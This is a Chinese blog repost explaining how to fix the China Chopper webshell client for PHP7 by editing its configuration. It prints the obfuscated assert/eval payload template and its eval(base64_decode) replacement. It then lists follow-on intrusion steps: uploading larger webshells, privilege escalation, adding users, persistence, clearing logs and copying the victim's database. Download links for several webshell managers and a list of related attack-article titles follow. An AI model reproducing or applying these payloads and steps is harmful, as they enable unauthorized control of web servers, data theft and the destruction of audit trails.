前言

逆天还是上学那会玩渗透的,后来工作后就再也没碰了,所以用的工具还是以前经典款,这不,发现出问题了

问题

如果是PHP5则没有问题,如果是PHP7,会出现:Cannot call assert() with string argument dynamically的提示

解决

用谷歌搜了下,发现了这篇解释:https://www.freebuf.com/articles/web/197013.html

知道了本质就简单了,菜刀这个软件之所以经典就是因为它的灵活性很强,修改下配置文件即可

PS:把array_map("ass"."ert",array("ev"."Al(\"\\\$xx%%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('%s'));\");"));改成eval(base64_decode('%s'));即可

这时候文件管理的功能就能使用了,下面就是常规操作了(文件上传下载、大马、提权、建用户、远程连接、权限维持、清日记...)

PS:copy数据库、网站,本地搭建一个和服务器一样的环境,进一步探索与发现~~~

附录

菜刀下载:https://github.com/raddyfiy/caidao-official-version

取代菜刀:蚁剑:https://github.com/AntSwordProject/AntSword-Loader or Cknife:https://github.com/Chora10/Cknife

转载于:https://www.cnblogs.com/dotnetcrazy/p/11407505.html

菜刀连接一句话木马出现:`Cannot call assert() with string argument dynamically`错误相关推荐

  1. CTF竞赛实战 中国菜刀与一句话木马

    一.基本操作: 往目标CTF提供的网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录,从而获取Flag,首先需要明确的是,中国菜刀本身是一个病毒,会被 ...

  2. java 菜刀_jsp一句话木马菜刀

    1.如何使用JSP一句话木马和菜刀木马 相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站. 近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩 ...

  3. 蚁剑连接一句话木马演示

    需要准备 一台虚拟机作为服务器,一台作为攻击机(可用主机),将虚拟机的网络都设置为桥接. 我这里服务器用win2008R2系统 攻击机用win10 接下来我会演示 php 的一句话木马 其他脚本语言的 ...

  4. 中国蚁剑连接一句话木马

    一句话木马源文件 添加连接 进入虚拟终端

  5. 一句话木马拿Shell与菜刀原理

    一.拿Shell的技巧 1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1 ...

  6. php限制一个函数在几分钟内不被调用_在PHP一句话木马使用过程中的种种坑点分析...

    前言 在平时的学习和练习过程中,经常会遇到上传的一句话木马无法执行我们的命令或者说能执行命令但是不能连接菜刀蚁剑等webshell管理工具,以及各个版本PHP所限制的一些一句话木马的写法,不同版本we ...

  7. 一句话木马、中国菜刀、图片一句话制作、过狗一句话

    一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用. 常用一句话木马 asp一句话木马: <%execute(request("value"))%& ...

  8. php如何用菜刀连接getshell,phpmyadmin之getshell总结

    title: phpmyadmin中getshell的几种姿势 1,利用全局变量general_log去getshell show variables like '%general%'; 然后将gen ...

  9. php过waf 一句话,(转)一句话木马绕过WAF

    在渗透测试的后期,为了维持权限.我们通常都会选择使用大小马或者通过添加账户等各种各样的方式给自己留个后门.但是事情总不是一帆风顺的,在上传一句话木马以及使用一句话木马的过程中我们要跟WAF斗智斗勇.今 ...

最新文章

  1. Ubuntu下使用CMake编译OpenSSL源码操作步骤(C语言)
  2. UI设计要做什么,UI设计培训都要学什么
  3. http2.0的时代来了
  4. MongoDB身份验证
  5. R统计和作图文章汇总
  6. Preparedstatement和statement 区别
  7. python mongodb_python实现mongodb的增删改查
  8. Shell子程序结构,函数
  9. SSD固态硬盘知识简介
  10. 熟练操作mac系统只需十分钟(Mac新手必看)!!
  11. 服务器加密机工作原理,服务器密码机
  12. vue3+ts+vant移动端H5项目搭建
  13. 企业微信会议室管理,对接企业微信官方应用会议室,会议管理系统功能清单
  14. postgresql之repmgr
  15. 罗振宇 知识就是力量:怎样成为一个不纠结的人
  16. c++日志库实战——spdlog,是不是感觉log4cxx有点笨重,不妨试一试spdlog
  17. access百度翻译 get_【Access示例】英文翻译成中文
  18. 微信小程序折叠面板 (类似手风琴 收起展开一样的噢)
  19. 日撸 Java 三百行(81-90天,CNN 卷积神经网络)
  20. 深入浅出ModbusTcp

热门文章

  1. 毕竟几人真得鹿,不知终日梦为鱼
  2. 【论文笔记】一些关于区块链的激励系统的论文笔记
  3. 预约直播|揭秘鸿蒙全新流量阵地,元服务带来的体验变革
  4. 【数学建模】2016年B题
  5. html表单提交及用户名校验,javascript表单提交验证(用户名,邮箱,,,,,)...
  6. Maven打包插件Assembly(七)
  7. 07_I.MX6ULL_Cortex-A中断原理
  8. 指定计算机上虚拟磁盘位置,Windows10系统下创建虚拟磁盘的方法
  9. 驱动到底是什么?为什么要装驱动?
  10. WPF MVVMLight Treeview中的SelectedItem